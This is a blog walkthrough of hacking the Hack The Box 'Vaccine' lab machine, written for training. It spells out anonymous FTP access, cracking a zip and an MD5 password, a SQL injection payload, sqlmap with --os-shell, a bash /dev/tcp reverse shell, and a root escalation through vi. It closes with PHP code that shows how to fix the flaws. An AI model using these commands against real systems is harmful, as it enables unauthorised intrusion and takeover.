Hacking the Vaccine machine — Hack The Box

Ishan Choudhary, published in Nerd For Tech
8 min read, Mar 6, 2022


source: www.hackthebox.eu

In this article we will be hacking the Vaccine machine on Hack The Box. I assume you already have a Hack The Box account.

Tools being used:

To get started, connect to the Hack The Box VPN, then spawn the machine. Let's run an nmap scan against it. The scan shows which services are running on the machine and their versions, which tells us where to look for promising exploits.

$ nmap -sV -sC -O -F [target_ip]
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

There is an ftp service running on this machine. The results also show:

21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip

We can see there is a misconfiguration in the FTP service: anonymous FTP login is allowed! This is great, because now we can simply connect to the FTP service. We will try the login by finding a username that is accepted without a password.

A list of common usernames:
root
admin
Administrator
Anonymous
user

Command to connect to FTP service:

ftp [target_ip] [port]

And we can see that if we input the name Anonymous, then we do not need to put a password!

Let's list all the files in this directory:

ftp> ls -la
drwxr-xr-x 2 0 0 4096 Apr 13 2021 .
drwxr-xr-x 2 0 0 4096 Apr 13 2021 ..
-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip

There is an interesting file called backup.zip. Let's download it and see what it contains. To download this file:

get backup.zip

Quit the connection by typing:

exit

Let's try extracting this zip.

It seems we'll need a password for this. Luckily we can use a tool called John the Ripper to crack this password-protected zip. First we'll use zip2john to generate a hash from the archive.

A hash value is a unique value that corresponds to the content of the file. Rather than identifying the contents of a file by its file name, extension, or other designation, a hash assigns a unique value to the contents of a file.
-docs.microsoft.com

Run this in your terminal:

zip2john backup.zip > hack.txt

This will create the hash and save it in a file called hack.txt. Now we need to crack this hash to get the password. We will use John the Ripper for this: the first command runs the cracking, and --show then prints any password it recovered. In your terminal type:

john hack.txt
john hack.txt --show

Result:

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

The password shown here is ‘741852963’. Let's type that in as the password, extract the archive, and examine the contents of index.php.

We can see that the username and password are present. However, the password has been stored as an MD5 hash, as seen in this line:

md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3"

MD5 is a hashing function. It cannot be reversed directly, but a short or common password can be recovered by looking the hash up in a precomputed table, and https://md5.gromweb.com/ does exactly that. Let's look at the result:

So the password was qwerty789. Let's try logging into the website.

We can see that the website is plain. However, there is a search bar. If we type random text and hit enter, nothing is shown. However, if the search bar is empty and we still hit the search button, the entire table is shown again. Let's check whether it is vulnerable to SQL injection. We will type this in the search box:

';--[Replace this with any random text]

This will convert to:

SELECT * FROM cars WHERE name ilike '';--[RANDOM TEXT THAT WE PUT IN SEARCH]

Everything after ilike ' is our search input. We first closed the quote so that nothing is actually searched, and ended that statement with ";", because every SQL statement ends with ";". Then we used "--" to mark everything after it as a comment: it is not code and it won't be run. Basically we are searching for nothing. If the input reaches the query unescaped, the expected outcome is the entire table shown again. If it is not shown, then it's probably not vulnerable to SQL injection.

Our query worked! This proves that the website is vulnerable to SQL injection. A normal website would probably show an error message instead. We can use the tool sqlmap to see whether the SQL injection gives us command execution, meaning that we can run OS commands on the server. Use the command

> sqlmap -u "http://[IP OF TARGET]/dashboard.php?search=Elixir" -p search --os-shell --cookie 'PHPSESSID=Replace_this_text_with_the_value_for_PHPSESSID'

The -u parameter specifies the URL to test. We add "search=" because whatever we type into the website's search box is sent in the "search=" parameter; you can see this in the address bar after a search. The "--os-shell" option will check whether we can get command execution. We also need to add our cookie, because without it sqlmap is redirected to the login page. To get your cookie in Firefox, right click the page, choose Inspect, go to the Storage tab and you will find your cookies there:

Let's run this command. sqlmap may ask the following prompts; answer them as I have:

“Y” for this since we have got the database management system.
“Y” for this as well.
We know that the “search” parameter is vulnerable, based on our testing, so there is no need in searching anything else.

Result:

There we go! Now we can run OS commands through the database management system. We can't do much with this shell, so let's get a reverse connection using netcat. First open a new terminal on your host machine and type:

> nc -lvnp 3000

This will listen for incoming connections from any IP address on port 3000. In your sqlmap os-shell type:

os-shell> bash -c 'bash -i >& /dev/tcp/[YOUR IP]/3000 0>&1'

Make sure to use the IP address that the VPN has given you: run ifconfig on your host machine and choose the address that only appears while you are connected to the HTB VPN. Hit enter, and type "y" when it asks. Go back to your host machine, and you should now see this at the end:

postgres@vaccine:/var/lib/postgresql/11/main$ 

We have our reverse connection! Currently it is a "dumb" shell. Let's upgrade it to an interactive shell, so that we can clear the screen and do the other things you can do in a normal terminal. Enter this in the terminal:

postgres@vaccine:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'

Then press Ctrl+Z to background this reverse connection. After that enter the following command in the terminal:

stty raw -echo; fg

The ";" allows us to run multiple commands on the same line. After stty raw -echo, anything you type will look odd, which is why we run the second command immediately. "fg" brings back the reverse connection that we backgrounded. After this, type in the terminal:

export TERM=xterm

(Note: don't worry if your terminal looks weird after fg. Also, once you have exited this reverse connection, enter "reset" to make your terminal look normal again.)

And now we have a proper tty shell. To test this, simply run the clear command, and it should clear the screen.

Time to search for the user flag. Type this in the terminal:

find / -name "user.txt" 2>/dev/null

This searches the whole filesystem for a file named "user.txt". The 2>/dev/null discards error messages (such as "Permission denied" for directories we cannot read), so only matches are shown. Result:

/var/lib/postgresql/user.txt

Type:

cat /var/lib/postgresql/user.txt

And you will have the user flag. Now it's time to look for the root flag. But before we can do that, we need to find a password that gets us to root. We will have to do this the hard way, manually checking each file. /var/www/html is usually the folder that contains the website's files, so let's check that out.

postgres@vaccine:/var/www$ cd /var/www/html
postgres@vaccine:/var/www$ ls
bg.png dashboard.js index.php style.css
dashboard.css dashboard.php license.txt

Of these, index.php and style.css were already in backup.zip; the other five files are new. Let's first check out dashboard.php:

postgres@vaccine:/var/www$ cat dashboard.php

When you scroll down the file you will see:

We have the password! It is: “P@s5w0rd!”

Note that if the connection closes unexpectedly now, we don't have to worry: we can simply SSH into the system, since we have a password and an SSH port was open on the machine. Type this in the terminal:

$ ssh postgres@[Target_IP]

Then type in the password when it asks for it. Note that you won't see the password being typed, but rest assured it is being entered. You should see something like this as the output:

Let's check what we can run as this user.

postgres@vaccine:~$ sudo -l
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

So we can run this command:

/bin/vi /etc/postgresql/11/main/pg_hba.conf

as the current user. Vi is an old text editor for Unix systems. According to gtfobins.github.io there is a way to misuse this to get a shell as the root user. First let's run this command, and type the postgres password we found earlier when asked for it.

It will open the file in vi. Now simply run these commands; whatever you type should show up at the bottom:

:set shell=/bin/sh
:shell

Output:

Type:

# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

We are now the root user! Let's search for the root flag:

# find / -name root.txt 2>/dev/null
/root/root.txt
# cat /root/root.txt

We have the root flag!
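Looking back at the two web-side defects this box leans on (the bare MD5 comparison in index.php and the search term spliced into the SQL text behind dashboard.php), here is each one next to a hardened version. This is added example code, not the box's own files; it assumes a pg_connect() handle $db and the cars table the walkthrough's query references.

```php
<?php
// Added example, not code from the Vaccine machine: the weak check and the
// weak query the walkthrough exploits, each beside a fixed version.
// Assumes $db is a pg_connect() resource and cars(name, ...) exists.

// --- 1. Login check -------------------------------------------------------
// Weak (as seen in index.php): a fast, unsalted MD5 of the password is
// compared to a hard-coded digest, so the digest can be looked up directly.
function login_weak(string $password): bool
{
    return md5($password) === "2cb42f8734ea607eefed3b70af13bbd3";
}

// Hardened: a salted, deliberately slow hash. The stored value is produced
// once at enrollment with password_hash() and checked with password_verify().
function enroll_password(string $newPassword): string
{
    return password_hash($newPassword, PASSWORD_DEFAULT);
}

function login_hardened(string $password, string $storedHash): bool
{
    return password_verify($password, $storedHash);
}

// --- 2. Search query ------------------------------------------------------
// Weak (the query the walkthrough reconstructs): the search term becomes part
// of the SQL text, so a quote followed by ;-- ends the string and comments
// out whatever the application appended after it.
function search_weak($db, string $term)
{
    $sql = "SELECT * FROM cars WHERE name ilike '" . $term . "'";
    return pg_query($db, $sql);
}

// Hardened: the term is sent as a bound parameter ($1), never as SQL text,
// so quotes and comment markers are just characters to match against.
function search_hardened($db, string $term)
{
    $sql = 'SELECT * FROM cars WHERE name ILIKE $1';
    return pg_query_params($db, $sql, [$term]);
}
```

With search_hardened, the walkthrough's ';-- input simply matches no car names instead of rewriting the statement.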

And that is it for this article. I hope you enjoyed it. If you did, then please clap and share to all others who might find this useful. Thanks for reading!


I am a high school student and an aspiring software developer. In my free time, I post programming tutorials over here.